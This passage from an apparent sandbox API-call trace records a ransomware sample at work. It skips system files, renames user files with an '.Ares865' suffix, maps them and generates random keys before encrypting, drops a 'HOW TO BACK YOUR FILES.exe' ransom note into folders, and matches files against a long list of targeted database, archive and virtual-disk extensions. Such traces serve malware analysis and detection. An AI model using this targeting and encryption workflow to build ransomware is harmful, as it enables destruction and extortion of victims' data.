hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.095] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.095] CloseHandle (hObject=0x120) returned 1 [0067.095] CloseHandle (hObject=0x12c) returned 1 [0067.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.096] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.096] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bba58c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.097] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.097] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab46fc5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8ab46fc5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8ab46fc5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Remote Assistance.lnk", cAlternateFileName="REMOTE~1.LNK")) returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="aoldtz.exe") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2=".") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="..") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="windows") returned -1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="bootmgr") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="temp") returned -1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="pagefile.sys") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="boot") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="ids.txt") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="ntuser.dat") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="perflogs") returned 1 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2="MSBuild") returned 1 [0067.097] lstrlenW (lpString="Remote Assistance.lnk") returned 21 [0067.097] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Desktop.ini") returned 62 [0067.097] lstrcpyW (in: lpString1=0x2cce466, lpString2="Remote Assistance.lnk" | out: lpString1="Remote Assistance.lnk") returned="Remote Assistance.lnk" [0067.097] lstrlenW (lpString="Remote Assistance.lnk") returned 21 [0067.097] lstrlenW (lpString="Ares865") returned 7 [0067.097] lstrcmpiW (lpString1="nce.lnk", lpString2="Ares865") returned 1 [0067.097] lstrlenW (lpString=".dll") returned 4 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2=".dll") returned 1 [0067.097] lstrlenW (lpString=".lnk") returned 4 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2=".lnk") returned 1 [0067.097] lstrlenW (lpString=".ini") returned 4 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2=".ini") returned 1 [0067.097] lstrlenW (lpString=".sys") returned 4 [0067.097] lstrcmpiW (lpString1="Remote Assistance.lnk", lpString2=".sys") returned 1 [0067.097] lstrlenW (lpString="Remote Assistance.lnk") returned 21 [0067.098] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk.Ares865") returned 80 [0067.098] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\remote assistance.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\remote assistance.lnk.ares865"), dwFlags=0x1) returned 1 [0067.099] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\maintenance\\remote assistance.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.099] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1212) returned 1 [0067.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.099] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.099] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.100] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.100] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.100] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7c0, lpName=0x0) returned 0x120 [0067.114] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c0) returned 0x190000 [0067.115] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.116] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.116] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.117] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.117] CloseHandle (hObject=0x120) returned 1 [0067.117] CloseHandle (hObject=0x12c) returned 1 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.117] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab46fc5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8ab46fc5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8ab46fc5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Remote Assistance.lnk", cAlternateFileName="REMOTE~1.LNK")) returned 0 [0067.117] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0067.117] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0067.117] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Java" [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0067.117] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0067.117] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Java") returned 43 [0067.118] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Start Menu\\Programs\\Java" | out: lpString1="C:\\Users\\All Users\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Start Menu\\Programs\\Java" [0067.118] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.118] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0067.118] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.118] GetLastError () returned 0x20 [0067.118] Sleep (dwMilliseconds=0xc8) [0067.309] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0067.309] GetLastError () returned 0x0 [0067.309] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0067.309] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0067.310] CloseHandle (hObject=0x15c) returned 1 [0067.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0067.310] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.310] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7577bc60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bba58c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.310] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.310] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.310] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.310] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7577bc60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4bba58c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bba58c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.310] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.310] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0067.310] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.310] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.310] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762ca4e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762ca4e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x7cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="About Java.lnk", cAlternateFileName="ABOUTJ~1.LNK")) returned 1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="aoldtz.exe") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2=".") returned 1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="..") returned 1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="windows") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="bootmgr") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="temp") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="pagefile.sys") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="boot") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="ids.txt") returned -1 [0067.310] lstrcmpiW (lpString1="About Java.lnk", lpString2="ntuser.dat") returned -1 [0067.311] lstrcmpiW (lpString1="About Java.lnk", lpString2="perflogs") returned -1 [0067.311] lstrcmpiW (lpString1="About Java.lnk", lpString2="MSBuild") returned -1 [0067.311] lstrlenW (lpString="About Java.lnk") returned 14 [0067.311] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\*") returned 45 [0067.311] lstrcpyW (in: lpString1=0x2cce458, lpString2="About Java.lnk" | out: lpString1="About Java.lnk") returned="About Java.lnk" [0067.311] lstrlenW (lpString="About Java.lnk") returned 14 [0067.311] lstrlenW (lpString="Ares865") returned 7 [0067.311] lstrcmpiW (lpString1="ava.lnk", lpString2="Ares865") returned 1 [0067.311] lstrlenW (lpString=".dll") returned 4 [0067.311] lstrcmpiW (lpString1="About Java.lnk", lpString2=".dll") returned 1 [0067.311] lstrlenW (lpString=".lnk") returned 4 [0067.311] lstrcmpiW (lpString1="About Java.lnk", lpString2=".lnk") returned 1 [0067.311] lstrlenW (lpString=".ini") returned 4 [0067.311] lstrcmpiW (lpString1="About Java.lnk", lpString2=".ini") returned 1 [0067.311] lstrlenW (lpString=".sys") returned 4 [0067.311] lstrcmpiW (lpString1="About Java.lnk", lpString2=".sys") returned 1 [0067.311] lstrlenW (lpString="About Java.lnk") returned 14 [0067.311] lstrlenW (lpString="bak") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.311] lstrlenW (lpString="ba_") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.311] lstrlenW (lpString="dbb") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.311] lstrlenW (lpString="vmdk") returned 4 [0067.311] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.311] lstrlenW (lpString="rar") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.311] lstrlenW (lpString="zip") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.311] lstrlenW (lpString="tgz") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.311] lstrlenW (lpString="vbox") returned 4 [0067.311] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.311] lstrlenW (lpString="vdi") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.311] lstrlenW (lpString="vhd") returned 3 [0067.311] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.311] lstrlenW (lpString="vhdx") returned 4 [0067.312] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.312] lstrlenW (lpString="avhd") returned 4 [0067.312] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.312] lstrlenW (lpString="db") returned 2 [0067.312] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.312] lstrlenW (lpString="db2") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.312] lstrlenW (lpString="db3") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.312] lstrlenW (lpString="dbf") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.312] lstrlenW (lpString="mdf") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.312] lstrlenW (lpString="mdb") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.312] lstrlenW (lpString="sql") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.312] lstrlenW (lpString="sqlite") returned 6 [0067.312] lstrcmpiW (lpString1="va.lnk", lpString2="sqlite") returned 1 [0067.312] lstrlenW (lpString="sqlite3") returned 7 [0067.312] lstrcmpiW (lpString1="ava.lnk", lpString2="sqlite3") returned -1 [0067.312] lstrlenW (lpString="sqlitedb") returned 8 [0067.312] lstrcmpiW (lpString1="Java.lnk", lpString2="sqlitedb") returned -1 [0067.312] lstrlenW (lpString="xml") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.312] lstrlenW (lpString="$er") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.312] lstrlenW (lpString="4dd") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.312] lstrlenW (lpString="4dl") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.312] lstrlenW (lpString="^^^") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.312] lstrlenW (lpString="abs") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.312] lstrlenW (lpString="abx") returned 3 [0067.312] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.313] lstrlenW (lpString="accdb") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accdb") returned -1 [0067.313] lstrlenW (lpString="accdc") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accdc") returned -1 [0067.313] lstrlenW (lpString="accde") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accde") returned -1 [0067.313] lstrlenW (lpString="accdr") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accdr") returned -1 [0067.313] lstrlenW (lpString="accdt") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accdt") returned -1 [0067.313] lstrlenW (lpString="accdw") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accdw") returned -1 [0067.313] lstrlenW (lpString="accft") returned 5 [0067.313] lstrcmpiW (lpString1="a.lnk", lpString2="accft") returned -1 [0067.313] lstrlenW (lpString="adb") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.313] lstrlenW (lpString="adb") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.313] lstrlenW (lpString="ade") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.313] lstrlenW (lpString="adf") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.313] lstrlenW (lpString="adn") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.313] lstrlenW (lpString="adp") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.313] lstrlenW (lpString="alf") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.313] lstrlenW (lpString="ask") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.313] lstrlenW (lpString="btr") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.313] lstrlenW (lpString="cat") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.313] lstrlenW (lpString="cdb") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.313] lstrlenW (lpString="ckp") returned 3 [0067.313] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.314] lstrlenW (lpString="cma") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.314] lstrlenW (lpString="cpd") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.314] lstrlenW (lpString="dacpac") returned 6 [0067.314] lstrcmpiW (lpString1="va.lnk", lpString2="dacpac") returned 1 [0067.314] lstrlenW (lpString="dad") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.314] lstrlenW (lpString="dadiagrams") returned 10 [0067.314] lstrcmpiW (lpString1="t Java.lnk", lpString2="dadiagrams") returned 1 [0067.314] lstrlenW (lpString="daschema") returned 8 [0067.314] lstrcmpiW (lpString1="Java.lnk", lpString2="daschema") returned 1 [0067.314] lstrlenW (lpString="db-journal") returned 10 [0067.314] lstrcmpiW (lpString1="t Java.lnk", lpString2="db-journal") returned 1 [0067.314] lstrlenW (lpString="db-shm") returned 6 [0067.314] lstrcmpiW (lpString1="va.lnk", lpString2="db-shm") returned 1 [0067.314] lstrlenW (lpString="db-wal") returned 6 [0067.314] lstrcmpiW (lpString1="va.lnk", lpString2="db-wal") returned 1 [0067.314] lstrlenW (lpString="dbc") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.314] lstrlenW (lpString="dbs") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.314] lstrlenW (lpString="dbt") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.314] lstrlenW (lpString="dbv") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.314] lstrlenW (lpString="dbx") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.314] lstrlenW (lpString="dcb") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.314] lstrlenW (lpString="dct") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0067.314] lstrlenW (lpString="dcx") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0067.314] lstrlenW (lpString="ddl") returned 3 [0067.314] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0067.314] lstrlenW (lpString="dlis") returned 4 [0067.314] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0067.315] lstrlenW (lpString="dp1") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0067.315] lstrlenW (lpString="dqy") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0067.315] lstrlenW (lpString="dsk") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0067.315] lstrlenW (lpString="dsn") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0067.315] lstrlenW (lpString="dtsx") returned 4 [0067.315] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0067.315] lstrlenW (lpString="dxl") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0067.315] lstrlenW (lpString="eco") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0067.315] lstrlenW (lpString="ecx") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0067.315] lstrlenW (lpString="edb") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0067.315] lstrlenW (lpString="epim") returned 4 [0067.315] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0067.315] lstrlenW (lpString="fcd") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0067.315] lstrlenW (lpString="fdb") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0067.315] lstrlenW (lpString="fic") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0067.315] lstrlenW (lpString="flexolibrary") returned 12 [0067.315] lstrcmpiW (lpString1="out Java.lnk", lpString2="flexolibrary") returned 1 [0067.315] lstrlenW (lpString="fm5") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0067.315] lstrlenW (lpString="fmp") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0067.315] lstrlenW (lpString="fmp12") returned 5 [0067.315] lstrcmpiW (lpString1="a.lnk", lpString2="fmp12") returned -1 [0067.315] lstrlenW (lpString="fmpsl") returned 5 [0067.315] lstrcmpiW (lpString1="a.lnk", lpString2="fmpsl") returned -1 [0067.315] lstrlenW (lpString="fol") returned 3 [0067.315] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0067.316] lstrlenW (lpString="fp3") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0067.316] lstrlenW (lpString="fp4") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0067.316] lstrlenW (lpString="fp5") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0067.316] lstrlenW (lpString="fp7") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0067.316] lstrlenW (lpString="fpt") returned 3 [0067.316] lstrcmpiW 